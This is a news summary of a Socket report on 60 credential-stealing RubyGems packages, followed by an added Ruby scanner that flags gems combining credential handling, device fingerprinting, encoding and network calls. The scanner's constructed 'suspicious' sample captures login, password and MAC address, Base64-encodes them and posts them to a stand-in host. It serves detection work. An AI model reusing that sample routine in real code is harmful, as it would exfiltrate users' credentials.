Threat actors have been stealing developers' credentials with 60 malicious RubyGems packages that impersonate automation tools for social media and publishing platforms, including Instagram, X, TikTok, WordPress, Naver, and Telegram; together the packages have amassed more than 275,000 downloads since March 2023, according to BleepingComputer.
Despite presenting a seemingly legitimate graphical user interface and working functionality, the malicious packages, the most notable of which were WordPress-style automators, SEO tools, and Telegram-style bots, exfiltrated the credentials typed into their login forms in plaintext, along with device MAC addresses and package names, a report from Socket showed. While all of the packages have been reported to RubyGems, at least 16 remain on the open-source code repository, said Socket researchers, who also found credentials stolen by the packages for sale across multiple Russian-speaking dark web marketplaces. The findings, which follow a recent Socket report on malicious RubyGems packages typosquatting the open-source Fastlane plugin, should prompt software developers to scrutinize the libraries they install and the publishers behind them more closely, the researchers added.
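The behaviour described above, a gem that captures login-form input and device identifiers and ships them to a remote host, is the kind of combination a developer can look for before trusting an unfamiliar package. The following Ruby script is an added example, not code from the article, Socket's report, or any of the packages it describes: it walks an unpacked gem's `.rb` files and flags those that mix credential handling, device fingerprinting, encoding and outbound network calls. The indicator patterns, the risk thresholds and the two sample sources are assumptions constructed for illustration, not a vetted detection ruleset.

```ruby
# Added example: heuristic scanner for unpacked Ruby gem sources.
# Indicator patterns and risk levels are illustrative assumptions.
require "set"

INDICATORS = {
  network:     [/Net::HTTP/, /HTTParty/, /Faraday/, /TCPSocket/, /open-uri/, /URI\.open/],
  credentials: [/password/i, /passwd/i, /login/i, /\bauth(entication)?\b/i],
  fingerprint: [/mac(_| )?addr/i, /getifaddrs/, /ifconfig/, /ip link/, /Socket\.gethostname/],
  encoding:    [/Base64/, /\.unpack\(['"]m/, /Zlib/],
}.freeze

# Scan one source string. Returns {category => [line numbers]} for every
# category that matched at least once.
def scan_source(src)
  hits = Hash.new { |h, k| h[k] = [] }
  src.each_line.with_index(1) do |line, no|
    INDICATORS.each do |cat, pats|
      hits[cat] << no if pats.any? { |p| line.match?(p) }
    end
  end
  hits
end

# Credential handling plus a network call is the combination the article
# describes; fingerprinting or encoding on top of that raises the level.
def risk_level(hits)
  cats = hits.keys.to_set
  if cats.include?(:network) && cats.include?(:credentials)
    (cats.include?(:fingerprint) || cats.include?(:encoding)) ? :high : :medium
  elsif cats.include?(:network)
    :low
  else
    :none
  end
end

# Scan every .rb file under a directory, e.g. the output of `gem unpack`.
def scan_gem_dir(dir)
  Dir.glob(File.join(dir, "**", "*.rb")).to_h do |path|
    hits = scan_source(File.read(path))
    [path, { hits: hits, risk: risk_level(hits) }]
  end
end

# Constructed sample sources (not real gem code) for a stand-alone run.
BENIGN = <<~RUBY
  require "json"
  def greet(name)
    puts "hello " + name
  end
RUBY

SUSPICIOUS = <<~RUBY
  require "net/http"
  require "base64"
  def on_login(form)
    mac = `ifconfig`[/(\\h\\h:){5}\\h\\h/]
    payload = { login: form[:login], password: form[:password], mac: mac }
    Net::HTTP.post(URI("http://example.invalid/collect"), Base64.strict_encode64(payload.to_json))
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  [["benign", BENIGN], ["suspicious", SUSPICIOUS]].each do |name, src|
    hits = scan_source(src)
    puts "#{name}: #{risk_level(hits)} #{hits.map { |c, l| "#{c}=#{l.inspect}" }.join(' ')}"
  end
  # Any directories given on the command line are scanned for real.
  ARGV.each do |dir|
    scan_gem_dir(dir).each { |path, r| puts "#{r[:risk]}\t#{path}" if r[:risk] != :none }
  end
end
```

Run it against `gem unpack some-gem` output to get a per-file risk line; a `:high` hit is a prompt to read the file, not a verdict, since legitimate clients also post credentials to their own API. The check complements, rather than replaces, looking at the publisher's history and how recently the gem appeared on RubyGems.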